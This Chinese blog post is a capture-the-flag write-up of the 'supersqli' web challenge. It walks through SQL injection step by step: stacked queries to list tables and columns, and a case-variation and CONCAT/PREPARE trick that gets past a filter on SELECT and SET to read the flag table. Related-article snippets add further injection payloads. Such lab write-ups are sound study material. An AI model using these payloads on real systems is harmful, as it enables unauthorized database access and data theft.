supersqli

最新推荐文章于 2024-04-09 17:32:29 发布
最新推荐文章于 2024-04-09 17:32:29 发布
阅读量82 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljj20020718/article/details/131166826
版权
文章描述了一次SQL注入的过程,从发现单引号闭合的注入点开始,通过ORDERBY判断字段数,尝试SELECT查询但被过滤。接着,作者使用堆叠注入、显示表格和列,尽管遇到了过滤,但通过大小写绕过成功执行了预编译的SQL命令,最终获取了名为flag的列的信息。
摘要由CSDN通过智能技术生成
  1. 首先输入有个单引号,出现报错信息,说明是单引号闭合的字符型注入
  2. 输入'#发现成功闭合 
  3.  使用order by判断出字段数为2,然后使用select查询,但发现select被过滤了
  4. 然后我们可以尝试堆叠注入,输入:';show tables;--+ ,发现存在两个表
  5. 查看表的结构:这里由于有一个表的名字为纯数字,所以需要使用反引号括起来,payload为:';show columns from `1919810931114514`;--+,发现存在一列为flag
  6.  想要查询flag列但select被过滤了,所以可以试试预编译:payload为:';set @sql=CONCAT('sele','ct * from `1919810931114514`;');prepare aaa from @sql;EXECUTE aaa;发现set和prepare被过滤了
  7. 尝试使用大小写绕过,payload:';sEt @sql=CONCAT('sele','ct * from `1919810931114514`;');prepArE aaa from @sql;EXECUTE aaa;#发现成功 

 

JayJay_Lin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SuperSQLEXEC
04-02
SuperSQLEXEC
[攻防世界]supersqli
weixin_55466841的博客
04-30 242
输个单引号看看, 可以判断出来是字符型注入。 1' and 1=1# #有回显 1' and 1=2# #无回显 判断列数 1' order by 1# 1' order by 2# ... 2列。 用联合注入发现过滤了好多关键字 接下来用堆叠注入。 1'; show databases;# 1'; show tables;# ';show columns from `1919810931114514`;# ';show colu...
攻防世界XCTF:supersqli
末初的CSDN博客
03-13 2370
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
攻防世界——supersqli
weixin_62281892的博客
09-18 1826
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
日常收集常用SQL查询语句大全
09-10
SQL,全称Structured Query Language,是用于管理关系数据库的标准语言。本文主要介绍了一些日常工作中常见的SQL查询语句,包括简单查询和复杂查询,对于数据库管理、数据分析和开发人员来说非常实用。...
攻防世界-supersqli
m0_63563528的博客
03-28 511
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
【攻防世界】——WEB高手进阶--supersqli
weixin_43828818的博客
05-23 560
题目进去就是一个常见的注入,提交个1正常返回数据,提交’返回错误,存在注入。 order by 2–+时候正常返回,order by 3–+报错,发现有2个字段。接着正常程序走,准备联合查询字段,果然,不可能给的那么简单,果然报错,正则过滤了一些常用的查询关键字。 尝试了多种普通绕过,大小写、重写都绕过不了,后来想到了堆叠注入;果然可以 1‘;show talbes–+ 查看两个表的字段名,在·1919810931114514·中发现我们想要的flag,查看words看一下结构。 1’;show c
SuperSQL注入.rar
07-21
一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
【攻防世界】五 --- supersqli
qq_43168364的博客
12-23 419
题目 — supersqli 一、writeup 二、知识点
攻防世界之supersqli
qq_44111753的博客
11-16 338
攻防世界 supersqli 题目 WP: 输入1、2、3提交 发现输入的数值提交到inject 发现inject存在sql注入风险 尝试堆叠注入 发现数据库 查看supersqli中的表 发现两个表 尝试查询表内的所有内容 发现对select|update|delete|drop|insert|where进行了过滤 继续查看字段 发现1919810931114514表中的flag,但无法使用select语句,不能直接输入,但发现words表中的id属性和输入的参数inject很相似,都为整型
攻防世界-Web高手进阶区-supersqli(强网杯的随便注)
feng的博客
09-14 1637
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL注入。我们先简单的进行一些测试,发现是字符型注入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union注入的时候出现: return preg_match("/select|update|delete|drop|insert|
supersqli(SQL注入流程及常用SQL语句)
Welcome To Myon'Blog !
03-30 883
一、SQL注入知识学习 1、判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2、猜解sql查询语句中的字段数(order by 的使用) 3、判断显示位爆数据库的名字 4、注释(--+的使用) 5、堆叠注入 6、handler语句及用法 二、基于上述知识对此题的分析与解答 1、注入点、注入类型 2、判断列数 3、利用or 1=1暴露表中数据 联合注入 (1)看数据库 (2)查表名 (3)查询表中的列 6、处理被过滤 7、handler、hackba的使用
【攻防世界】supersqli(堆叠注入)
最新发布
2302_79800344的博客
04-09 874
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
WEB:supersqli(多解)
sleepywin的博客
07-16 938
背景知识 sql注入 堆叠注入 题目 输入款默认1,先输入1,页面正常显示 再输入1',显示报错 加上注释符号#或者--+或者%23(注释掉后面语句,使1后面的单引号与前面的单引号成功匹配就不会报错)页面回显正常,那么闭合符号就是单引号。 输入 1# 判断类型,查询1 and 1=1 和1 and 1=2,发现两次提交后页面一样,可以判断出为字符型注入漏洞; 使用万能注入语句 1' or 1=1# 回显不正常,存在注入
攻防世界web进阶区supersqli
gongjingege的博客
07-25 1860
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反
攻防世界supersqli
08-09
Supersqli是一种强大的SQL注入攻击技术,它可以绕过应用程序的安全机制并获取未经授权的访问权限。攻击者可以通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。 为了防御Supersqli攻击,开发人员可以采取以下措施: 1. 输入验证和过滤:对于所有用户输入的数据,进行严格的验证和过滤,确保只接受预期的数据类型和格式。 2. 使用参数化查询:使用参数化查询或预编译语句,而不是直接拼接用户输入的数据到SQL语句中。这样可以防止SQL注入攻击成功。 3. 最小权限原则:数据库用户应该具有最低权限来执行操作,以限制攻击者在成功注入后能够执行的操作范围。 4. 错误消息处理:不要向用户显示详细的错误消息,因为攻击者可能会利用这些错误消息来获取有关数据库结构和查询的信息。 5. 定期更新和漏洞扫描:及时更新应用程序和数据库,以确保已修复已知的漏洞,并对应用程序进行定期的漏洞扫描。 这些是一些常见的防御措施,但是请注意,没有绝对安全的系统,因此需要综合考虑多个安全层面来保护应用程序和数据库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值